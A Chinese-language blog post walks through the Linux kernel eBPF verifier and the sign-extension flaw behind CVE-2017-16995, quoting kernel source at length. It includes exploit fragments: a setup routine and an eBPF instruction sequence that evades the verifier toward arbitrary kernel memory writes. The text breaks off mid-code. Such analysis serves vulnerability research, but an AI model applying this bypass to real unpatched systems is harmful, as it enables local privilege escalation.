Linux ebpf模块整数扩展问题导致提权漏洞分析(CVE-2017-16995)

这个漏洞在2017年底被Google Project Zero团队的Jann Horn发现并修复,然而在2018年4月再次被国外安全研究者Vitaly Nikolenko发现,并可以对特定内核版本的Ubuntu 16.04进行提权,这个漏洞不包含堆栈攻击或者控制流劫持,仅用系统调用数据进行提权,是Data-Oriented Attacks在linux内核上的一个典型应用。

本文分析基于v4.4.110,可以从这里下载编译,也可以从这里在线阅读,本文涉及到的代码、镜像等可从这里下载。

EBPF模块分析

之前在做pwnable.tw里的seccomp-tools一题时,曾经看过一部分bpf代码,但主要是为了逆向seccomp沙箱的规则。

BPF 的全称是 Berkeley Packet Filter,这是一个用于过滤(filter)网络报文(packet)的架构。Linux中常用的抓包软件tcpdump、wireshark都是基于这个模块来对用户提供抓包的接口的。在linux内核3.15以后,基于原有的BPF模块,Linux重新设计了BPF模块,并称之为extended BPF,简称EBPF。

EBPF主要可以为用户加载数据包过滤代码进入内核,并在收到数据包时触发这段代码。

一个常见的数据包过滤程序编写如下:

  1. 调用 syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr))申请一个map结构,这个结构是用户态与内核态交互的一块共享内存。内核态调用BPF_FUNC_map_lookup_elem来查看map中的数据。而用户态通过syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr))查看map中数据,用户可以通过syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr))对map数据进行更新,而map根据linux特性,会将其视为一个文件,并分配一个文件描述符。
  2. 调用syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr))将用户编写的EBPF代码加载进入内核,此时将完成对代码合法性的检查,采用模拟执行的方法。
  3. 调用setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)),将步骤2的EBPF代码与特定的socket进行绑定,此后对于每一个socket数据包执行EBPF代码进行检查,此时为真实执行。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static void prep(void) {
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
if (mapfd < 0)
__exit(strerror(errno));
puts("mapfd finished");
progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

if (progfd < 0)
__exit(strerror(errno));
puts("bpf_prog_load finished");
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
__exit(strerror(errno));
puts("socketpair finished");
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
__exit(strerror(errno));
puts("setsockopt finished");
}

EBPF指令集介绍

EBPF采用的指令集与内核使用的汇编指令不同,采用了一种基于bpf_insn数据结构的指令集,同时还维护了10个寄存器,一个栈,并且有与用户态交互的map结构。

首先是寄存器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
R0:一般用来表示函数返回值,包括整个 BPF 代码块(其实也可被看做一个函数)的返回值;
R1~R5:一般用于表示内核预设函数的参数;
R6~R9:在 BPF 代码中可以作存储用,其值不受内核预设函数影响;
R10:只读,用作栈指针(SP)
可理解对应为物理寄存器为:
R0 – rax
R1 - rdi
R2 - rsi
R3 - rdx
R4 - rcx
R5 - r8
R6 - rbx
R7 - r13
R8 - r14
R9 - r15
R10 – rbp

但内核寄存器的实现同EBPF模拟的栈一样,仍然依赖于栈上的临时变量,并不是直接映射为寄存器。后续将从代码层面分析。

接着是指令

1
2
3
4
5
6
7
struct bpf_insn {
__u8 code; /* opcode */
__u8 dst_reg:4; /* dest register */
__u8 src_reg:4; /* source register */
__s16 off; /* signed offset */
__s32 imm; /* signed immediate constant */
};

熟悉seccomp-tools的同学可能发现,这个结构和seccomp的基本差不多。程序的功能主要取决于code这个字节,代表功能,其中code操作码共有8个比特,其中最低3个比特代表大类功能,从如下代码中看出EBPF共分7类功能,定义如下:

1
2
3
4
5
6
7
8
9
10
#define BPF_CLASS,
(code) ((code) & 0x07)
#define BPF_LD 0x00
#define BPF_LDX 0x01
#define BPF_ST 0x02
#define BPF_STX 0x03
#define BPF_ALU 0x04
#define BPF_JMP 0x05
#define BPF_RET 0x06
#define BPF_MISC 0x07

而对于各大类功能还可以从通过异或组成不同的新功能。具体的操作可以参考实现中的定义名,根据操作名就可以看出来每一种功能的大意了,我写了一个解码编码的小工具放在github连接中,可以用来翻译或者辅助编写EBPF程序。

dst_reg代表目的寄存器,限制为0~10,src_reg代表目的寄存器,限制为0~10,off代表地址偏移,imm代表立即数。

下面将从代码层面分析EBPF的运行流程。

BPF_MAP_CREATE

这个系统调用首先调用map_create函数,这个函数就是之前分析的bpf模块整数溢出漏洞所在的函数,具体内容可以参照上一篇博客,其核心思想是对申请出一块内存空间,其大小是管理块结构体+attr参数中的size大小,为其分配fd,并将其放入到map队列中,可以用fd号来查找。此部分与本漏洞相关性不大。

map_create

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/* called via syscall */
static int map_create(union bpf_attr *attr)
{
struct bpf_map *map;
int err;

err = CHECK_ATTR(BPF_MAP_CREATE);
if (err)
return -EINVAL;

/* find map type and init map: hashtable vs rbtree vs bloom vs ... */
map = find_and_alloc_map(attr);
if (IS_ERR(map))
return PTR_ERR(map);

atomic_set(&map->refcnt, 1);
atomic_set(&map->usercnt, 1);

err = bpf_map_charge_memlock(map);
if (err)
goto free_map;

err = bpf_map_new_fd(map);
if (err < 0)
/* failed to allocate fd */
goto free_map;

return err;

free_map:
map->ops->map_free(map);
return err;
}

BPF_PROG_LOAD

这个系统调用用于将用户编写的EBPF规则加载进入内核,其中包含有多处校验。

bpf_prog_load

首先进入bpf_prog_load函数中,首先[1]检查的ebpf license是否为GPL证书的一种,[2]检查指令条数是否超过4096,[3]处利用kmalloc新建了一个bpf_prog结构体,并新建了一个用于存放EBPF程序的内存空间。[4]处将用户态的EBPF程序拷贝到刚申请的内存中。[5]处来判断是哪种过滤模式,其中socket_filter是数据包过滤,而tracing_filter就是对系统调用号及参数的过滤,也就是我们常见的seccomp。最终到达[5]处开始对用户输入的程序进行检查。如果通过检查就将fp中执行函数赋值为 __bpf_prog_run也就是真实执行函数,并尝试JIT加载,否则用中断的方法加载。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
static int bpf_prog_load(union bpf_attr *attr)
{
enum bpf_prog_type type = attr->prog_type;
struct bpf_prog *prog;
int err;
char license[128];
bool is_gpl;

if (CHECK_ATTR(BPF_PROG_LOAD))
return -EINVAL;

/* copy eBPF program license from user space */
if (strncpy_from_user(license, u64_to_ptr(attr->license),
sizeof(license) - 1) < 0)
return -EFAULT;
license[sizeof(license) - 1] = 0;

/* eBPF programs must be GPL compatible to use GPL-ed functions */
[1] is_gpl = license_is_gpl_compatible(license);

[2] if (attr->insn_cnt >= BPF_MAXINSNS) //4096
return -EINVAL;

if (type == BPF_PROG_TYPE_KPROBE &&
attr->kern_version != LINUX_VERSION_CODE)
return -EINVAL;

if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN))
return -EPERM;

/* plain bpf_prog allocation */
[3] prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
if (!prog)
return -ENOMEM;

err = bpf_prog_charge_memlock(prog);
if (err)
goto free_prog_nouncharge;

prog->len = attr->insn_cnt;

err = -EFAULT;
[4] if (copy_from_user(prog->insns, u64_to_ptr(attr->insns),
prog->len * sizeof(struct bpf_insn)) != 0)
goto free_prog;

prog->orig_prog = NULL;
prog->jited = 0;

atomic_set(&prog->aux->refcnt, 1);
prog->gpl_compatible = is_gpl ? 1 : 0;

/* find program type: socket_filter vs tracing_filter */
[5] err = find_prog_type(type, prog);
if (err < 0)
goto free_prog;

/* run eBPF verifier */
[6] err = bpf_check(&prog, attr); // here
if (err < 0)
goto free_used_maps;

/* fixup BPF_CALL->imm field */
fixup_bpf_calls(prog);

/* eBPF program is ready to be JITed */
err = bpf_prog_select_runtime(prog);
if (err < 0)
goto free_used_maps;

err = bpf_prog_new_fd(prog);
if (err < 0)
/* failed to allocate fd */
goto free_used_maps;

return err;

free_used_maps:
free_used_maps(prog->aux);
free_prog:
bpf_prog_uncharge_memlock(prog);
free_prog_nouncharge:
bpf_prog_free(prog);
return err;
}

bpf_check

下面进入加载的检查逻辑——bpf_check,首先在[1]处将特定指令中的mapfd换成相应的map实际地址,这里需要注意,map实际地址是一个内核地址,有8字节,这样就需要有两条指令的长度来存这个地址,具体可以看下面对这个函数的分析。[2]中借用了程序控制流图的思路来检查这个EBPF程序中是否有死循环和跳转到未初始化的位置,造成无法预期的风险。[3]是实际模拟执行的检测当上述有任一出现问题的检测,是检测的重点。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
char __user *log_ubuf = NULL;
struct verifier_env *env;
int ret = -EINVAL;

if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
return -E2BIG;

/* 'struct verifier_env' can be global, but since it's not small,
* allocate/free it every time bpf_check() is called
*/
env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
if (!env)
return -ENOMEM;

env->prog = *prog;

/* grab the mutex to protect few globals used by verifier */
mutex_lock(&bpf_verifier_lock);

if (attr->log_level || attr->log_buf || attr->log_size) {
/* user requested verbose verifier output
* and supplied buffer to store the verification trace
*/
log_level = attr->log_level;
log_ubuf = (char __user *) (unsigned long) attr->log_buf;
log_size = attr->log_size;
log_len = 0;

ret = -EINVAL;
/* log_* values have to be sane */
if (log_size < 128 || log_size > UINT_MAX >> 8 ||
log_level == 0 || log_ubuf == NULL)
goto free_env;

ret = -ENOMEM;
log_buf = vmalloc(log_size);
if (!log_buf)
goto free_env;
} else {
log_level = 0;
}

[1] ret = replace_map_fd_with_map_ptr(env); // 采用map结构将BPF_LD_IMM64中的imm参数替换。
if (ret < 0)
goto skip_full_check;

env->explored_states = kcalloc(env->prog->len,
sizeof(struct verifier_state_list *),
GFP_USER);
ret = -ENOMEM;
if (!env->explored_states)
goto skip_full_check;

[2] ret = check_cfg(env);//控制流图检查是否存在死循环和盲跳转
if (ret < 0)
goto skip_full_check;

env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

[3] ret = do_check(env);

skip_full_check:
while (pop_stack(env, NULL) >= 0);
free_states(env);

if (ret == 0)
/* program is valid, convert *(u32*)(ctx + off) accesses */
ret = convert_ctx_accesses(env);

if (log_level && log_len >= log_size - 1) {
BUG_ON(log_len >= log_size);
/* verifier log exceeded user supplied buffer */
ret = -ENOSPC;
/* fall through to return what was recorded */
}

/* copy verifier log back to user space including trailing zero */
if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
ret = -EFAULT;
goto free_log_buf;
}

if (ret == 0 && env->used_map_cnt) {
/* if program passed verifier, update used_maps in bpf_prog_info */
env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
sizeof(env->used_maps[0]),
GFP_KERNEL);

if (!env->prog->aux->used_maps) {
ret = -ENOMEM;
goto free_log_buf;
}

memcpy(env->prog->aux->used_maps, env->used_maps,
sizeof(env->used_maps[0]) * env->used_map_cnt);
env->prog->aux->used_map_cnt = env->used_map_cnt;

/* program is valid. Convert pseudo bpf_ld_imm64 into generic
* bpf_ld_imm64 instructions
*/
convert_pseudo_ld_imm64(env);
}

free_log_buf:
if (log_level)
vfree(log_buf);
free_env:
if (!env->prog->aux->used_maps)
/* if we didn't copy map pointers into bpf_prog_info, release
* them now. Otherwise free_bpf_prog_info() will release them.
*/
release_maps(env);
*prog = env->prog;
kfree(env);
mutex_unlock(&bpf_verifier_lock);
return ret;
}

replace_map_fd_with_map_ptr

replace_map_fd_with_map_ptr函数中,可以看到当满足[1]、[2]两个条件时,即opcode = BPF_LD | BPF_IMM | BPF_DW=0x18,且src_reg = BPF_PSEUDO_MAP_FD =1时,将根据imm的值进行map查找,并将得到的地址分成两部分,分别存储于该条指令和下一条指令的imm部分,与上文所说的占用两条指令是相符的。满足上述两个条件的语句又被命名为BPF_LD_MAP_FD,即把map地址放到寄存器里,该指令写完后,下一条指令应为无意义的填充。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;

for (i = 0; i < insn_cnt; i++, insn++) {
if (BPF_CLASS(insn->code) == BPF_LDX &&
(BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) {
verbose("BPF_LDX uses reserved fields\n");
return -EINVAL;
}// 不允许向寄存器直接写值 LDX

if (BPF_CLASS(insn->code) == BPF_STX &&
((BPF_MODE(insn->code) != BPF_MEM &&
BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) {
verbose("BPF_STX uses reserved fields\n");
return -EINVAL;
}//不允许向地址写寄存器 STX

[1] if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;

if (i == insn_cnt - 1 || insn[1].code != 0 ||
insn[1].dst_reg != 0 || insn[1].src_reg != 0 ||
insn[1].off != 0) {
verbose("invalid bpf_ld_imm64 insn\n");
return -EINVAL;
}//最后一条指令,下一条指令确定为0

if (insn->src_reg == 0)
/* valid generic load 64-bit imm */
goto next_insn;

[2] if (insn->src_reg != BPF_PSEUDO_MAP_FD) {
verbose("unrecognized bpf_ld_imm64 insn\n");
return -EINVAL;
}

f = fdget(insn->imm);
map = __bpf_map_get(f);
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
return PTR_ERR(map);
}

/* store map pointer inside BPF_LD_IMM64 instruction */
insn[0].imm = (u32) (unsigned long) map;
insn[1].imm = ((u64) (unsigned long) map) >> 32;

/* check whether we recorded this map already */
for (j = 0; j < env->used_map_cnt; j++)
if (env->used_maps[j] == map) {
fdput(f);
goto next_insn;
}

if (env->used_map_cnt >= MAX_USED_MAPS) {
fdput(f);
return -E2BIG;
}

/* hold the map. If the program is rejected by verifier,
* the map will be released by release_maps() or it
* will be used by the valid program until it's unloaded
* and all maps are released in free_bpf_prog_info()
*/
map = bpf_map_inc(map, false);
if (IS_ERR(map)) {
fdput(f);
return PTR_ERR(map);
}
env->used_maps[env->used_map_cnt++] = map;

fdput(f);
next_insn:
insn++;
i++;
}
}

/* now all pseudo BPF_LD_IMM64 instructions load valid
* 'struct bpf_map *' into a register instead of user map_fd.
* These pointers will be used later by verifier to validate map access.
*/
return 0;
}

do_check

下面进行check过程中最核心的do_check函数,首先可以看到整个程序处于一个for死循环中,其中维护了一系列寄存器,其寄存器变量定义和初始化如下,可以看到寄存器的值是一个int类型,并且有一个枚举的type变量,type类型包括未定义、位置、立即数、指针等,初始化时会将全部寄存器类型定义为未定义,赋值为0。第十个寄存器定义为栈指针,第一个定义为内容指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
struct reg_state {
enum bpf_reg_type type;
union {
/* valid when type == CONST_IMM | PTR_TO_STACK */
int imm;

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;
};
};

static void init_reg_state(struct reg_state *regs)
{
int i;

for (i = 0; i < MAX_BPF_REG; i++) {
regs[i].type = NOT_INIT;
regs[i].imm = 0;
regs[i].map_ptr = NULL;
}

/* frame pointer */
regs[BPF_REG_FP].type = FRAME_PTR;

/* 1st arg to a function */
regs[BPF_REG_1].type = PTR_TO_CTX;
}

/* types of values stored in eBPF registers */
enum bpf_reg_type {
NOT_INIT = 0, /* nothing was written into register */
UNKNOWN_VALUE, /* reg doesn't contain a valid pointer */
PTR_TO_CTX, /* reg points to bpf_context */
CONST_PTR_TO_MAP, /* reg points to struct bpf_map */
PTR_TO_MAP_VALUE, /* reg points to map element value */
PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
FRAME_PTR, /* reg == frame_pointer */
PTR_TO_STACK, /* reg == frame_pointer + imm */
CONST_IMM, /* constant integer value */
};

check函数的处理方式是逐条处理,按照不同的类型分别做check。由于指令比较多,不一样赘述了,下面从两个攻击角度去展示程序是如何检测的。

Q&A1:for循环如何会检查结束并退出

退出指令定义为BPF_EXIT,这个指令属于BPF_JMP大类,可以看到当指令为该条指令的时候会执行一个pop_stack操作,而当这个函数的返回值是负数的时候,用break跳出死循环。否则会用这个作为取值的位置去执行下一条指令。对于这个操作的理解是,当遇到条件跳转的时候,程序会默认执行一个分支,然后将另外一个分支压入stack中,当一个分支执行结束后,去检查另外一个分支,类似于迷宫问题解决里走到思路的退栈操作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
 else if (class == BPF_JMP) {
u8 opcode = BPF_OP(insn->code);

if (opcode == BPF_CALL) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->off != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_CALL uses reserved fields\n");
return -EINVAL;
}

err = check_call(env, insn->imm);
if (err)
return err;

} else if (opcode == BPF_JA) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_JA uses reserved fields\n");
return -EINVAL;
}

insn_idx += insn->off + 1;
continue;

} else if (opcode == BPF_EXIT) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_EXIT uses reserved fields\n");
return -EINVAL;
}

/* eBPF calling convetion is such that R0 is used
* to return the value from eBPF program.
* Make sure that it's readable at this time
* of bpf_exit, which means that program wrote
* something into it earlier
*/
err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
if (err)
return err;

if (is_pointer_value(env, BPF_REG_0)) {
verbose("R0 leaks addr as return value\n");
return -EACCES;
}

process_bpf_exit:
insn_idx = pop_stack(env, &prev_insn_idx);
if (insn_idx < 0) {
break;
} else {
do_print_state = true;
continue;
}
} else {
err = check_cond_jmp_op(env, insn, &insn_idx);
if (err)
return err;
}
}

查看一下pop_stack函数,函数中先判断env->head是否为0,如果是就代表没有未检查的路径了。否则将保持的state恢复。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static int pop_stack(struct verifier_env *env, int *prev_insn_idx)
{
struct verifier_stack_elem *elem;
int insn_idx;

if (env->head == NULL)
return -1;

memcpy(&env->cur_state, &env->head->st, sizeof(env->cur_state));
insn_idx = env->head->insn_idx;
if (prev_insn_idx)
*prev_insn_idx = env->head->prev_insn_idx;
elem = env->head->next;
kfree(env->head);
env->head = elem;
env->stack_size--;
return insn_idx;
}

然后看一下条件分支的处理代码check_cond_jmp_op,我们可以看到这个检查将跳转分成两种,第一种[1]处是JEQ和JNE,并且是比较的值是立即数的情况,此时就判断立即数是不是等于要比较的寄存器,进行直接跳转。第二种[2]处是其他情况,均需把off+1的值压入栈中作为另一条分支。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
static int check_cond_jmp_op(struct verifier_env *env,
struct bpf_insn *insn, int *insn_idx)
{
struct reg_state *regs = env->cur_state.regs;
struct verifier_state *other_branch;
u8 opcode = BPF_OP(insn->code);
int err;

if (opcode > BPF_EXIT) {
verbose("invalid BPF_JMP opcode %x\n", opcode);
return -EINVAL;
}

if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0) {
verbose("BPF_JMP uses reserved fields\n");
return -EINVAL;
}

/* check src1 operand */
err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;

if (is_pointer_value(env, insn->src_reg)) {
verbose("R%d pointer comparison prohibited\n",
insn->src_reg);
return -EACCES;
}
} else {
if (insn->src_reg != BPF_REG_0) {
verbose("BPF_JMP uses reserved fields\n");
return -EINVAL;
}
}

/* check src2 operand */
err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
if (err)
return err;

/* detect if R == 0 where R was initialized to zero earlier */
[1] if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE) &&
regs[insn->dst_reg].type == CONST_IMM &&
regs[insn->dst_reg].imm == insn->imm) {
if (opcode == BPF_JEQ) {
/* if (imm == imm) goto pc+off;
* only follow the goto, ignore fall-through
*/
*insn_idx += insn->off;
return 0;
} else {
/* if (imm != imm) goto pc+off;
* only follow fall-through branch, since
* that's where the program will go
*/
return 0;
}
}

[2] other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
if (!other_branch)
return -EFAULT;

/* detect if R == 0 where R is returned value from bpf_map_lookup_elem() */
if (BPF_SRC(insn->code) == BPF_K &&
insn->imm == 0 && (opcode == BPF_JEQ ||
opcode == BPF_JNE) &&
regs[insn->dst_reg].type == PTR_TO_MAP_VALUE_OR_NULL) {
if (opcode == BPF_JEQ) {
/* next fallthrough insn can access memory via
* this register
*/
regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
/* branch targer cannot access it, since reg == 0 */
other_branch->regs[insn->dst_reg].type = CONST_IMM;
other_branch->regs[insn->dst_reg].imm = 0;
} else {
other_branch->regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = 0;
}
} else if (is_pointer_value(env, insn->dst_reg)) {
verbose("R%d pointer comparison prohibited\n", insn->dst_reg);
return -EACCES;
} else if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE)) {

if (opcode == BPF_JEQ) {
/* detect if (R == imm) goto
* and in the target state recognize that R = imm
*/
other_branch->regs[insn->dst_reg].type = CONST_IMM;
other_branch->regs[insn->dst_reg].imm = insn->imm;
} else {
/* detect if (R != imm) goto
* and in the fall-through state recognize that R = imm
*/
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm;
}
}
if (log_level)
print_verifier_state(env);
return 0;
}

Q&A2:能否进行直接的内存读写?

内存读写需要用到的指令主要是BPF_LDX_MEM或者BPF_STX_MEM两类。如下,当r7和r8的值可控就可以达到内存任意写,类似于mov dword ptr[r7],r8这样的操作。

1
STX_MEM_DW(8,7,0x0,0x0)

接下来分析一下ST和LD有哪些限制,check_reg_arg[1]处检查寄存器是否访问寄存器的序号是否超过最大值10,如果是SRC_OP检查是否是未初始化的值。否则检查是否要写的地方是rbp,并将要写的寄存器值置为UNKOWN。然后是check_mem_access检查,该函数会根据读写类型检查dst或src的值是否为栈指针、数据包指针、map指针,否则不允许读写。:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
 else if (class == BPF_LDX) {
enum bpf_reg_type src_reg_type;

/* check for reserved fields is already done */

/* check src operand */
[1] err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;

[1] err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK);
if (err)
return err;

src_reg_type = regs[insn->src_reg].type;

/* check that memory (src_reg + off) is readable,
* the state of dst_reg will be updated by this func
*/
[2] err = check_mem_access(env, insn->src_reg, insn->off,
BPF_SIZE(insn->code), BPF_READ,
insn->dst_reg);
if (err)
return err;

if (BPF_SIZE(insn->code) != BPF_W) {
insn_idx++;
continue;
}

if (insn->imm == 0) {
/* saw a valid insn
* dst_reg = *(u32 *)(src_reg + off)
* use reserved 'imm' field to mark this insn
*/
insn->imm = src_reg_type;

} else if (src_reg_type != insn->imm &&
(src_reg_type == PTR_TO_CTX ||
insn->imm == PTR_TO_CTX)) {
/* ABuser program is trying to use the same insn
* dst_reg = *(u32*) (src_reg + off)
* with different pointer types:
* src_reg == ctx in one branch and
* src_reg == stack|map in some other branch.
* Reject it.
*/
verbose("same insn cannot be used with different pointers\n");
return -EINVAL;
}

} else if (class == BPF_STX) {
enum bpf_reg_type dst_reg_type;

if (BPF_MODE(insn->code) == BPF_XADD) {
err = check_xadd(env, insn);
if (err)
return err;
insn_idx++;
continue;
}

/* check src1 operand */
[1] err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;
/* check src2 operand */
[1] err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
if (err)
return err;

dst_reg_type = regs[insn->dst_reg].type;

/* check that memory (dst_reg + off) is writeable */
[2] err = check_mem_access(env, insn->dst_reg, insn->off,
BPF_SIZE(insn->code), BPF_WRITE,
insn->src_reg);
if (err)
return err;

if (insn->imm == 0) {
insn->imm = dst_reg_type;
} else if (dst_reg_type != insn->imm &&
(dst_reg_type == PTR_TO_CTX ||
insn->imm == PTR_TO_CTX)) {
verbose("same insn cannot be used with different pointers\n");
return -EINVAL;
}

}

以上情况,如果采用MOV这样的赋值指令去读写的话,寄存器类型会判定为IMM,而拒绝。另外一种是用BPF_FUNC_map_lookup_elem这样的函数调用返回,再赋给某个寄存器,然后再进行读写。而这种方法会在赋值时被设定为UNKNOWN而拒绝读写。

__bpf_prog_run

以上就是对于加载指令的全部检查,可以看到我们能想到的内存读写方法都是会被检测出来的。真正执行的时候代码在__bpf_prog_run中,其中可以看到所谓的各个寄存器和栈只是这个函数的局部变量:

1
2
3
4
5
6
7
static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
{
u64 stack[MAX_BPF_STACK / sizeof(u64)];
u64 regs[MAX_BPF_REG], tmp;
static const void *jumptable[256] = {
[0 ... 255] = &&default_label,
/* Now overwrite non-defaults ... */

程序维护了一个跳表,根据opcode来进行跳转,而函数中没有任何check,具体实现代码十分简单,就不赘述了。

可以发现程序的寄存器变量与check中的寄存器变量不太一样,此时是unsigned long long类型。

漏洞利用

利用整数扩展问题绕过bpf_check

本漏洞的原因是check函数和真正的函数的执行方法不一致导致的,主要问题是二者寄存器值类型不同。先看下面一段EBPF指令:

1
2
3
4
5
6
[0]: ALU_MOV_K(0,9,0x0,0xffffffff)
[1]: JMP_JNE_K(0,9,0x2,0xffffffff)
[2]: ALU64_MOV_K(0,0,0x0,0x0)
[3]: JMP_EXIT(0,0,0x0,0x0)
[4]: ......
......

第0条指令是将0xffffffff放入r9寄存器中,当在do_check函数中时,在[1]处会直接将0xffffffff复制给r9,并将type赋值为IMM。在第[1]条指令,比较r9==0xffffffff,相等时就执行[2]、[3],否则跳到[4]。根据前文对退出的分析,这个地方在do_check看来是一个恒等式,不会将另外一条路径压入stack,直接退出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
		if (class == BPF_ALU || class == BPF_ALU64) {
err = check_alu_op(env, insn);
if (err)
return err;
}
static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
{
struct reg_state *regs = env->cur_state.regs;
u8 opcode = BPF_OP(insn->code);
int err;

if (opcode == BPF_END || opcode == BPF_NEG) {
... ...
}

/* check src operand */
.......

/* check dest operand */
.......

} else if (opcode == BPF_MOV) {

if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0 || insn->off != 0) {
verbose("BPF_MOV uses reserved fields\n");
return -EINVAL;
}

/* check src operand */
err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;
} else {
if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
verbose("BPF_MOV uses reserved fields\n");
return -EINVAL;
}
}

/* check dest operand */
err = check_reg_arg(regs, insn->dst_reg, DST_OP);
if (err)
return err;

if (BPF_SRC(insn->code) == BPF_X) {
if (BPF_CLASS(insn->code) == BPF_ALU64) {
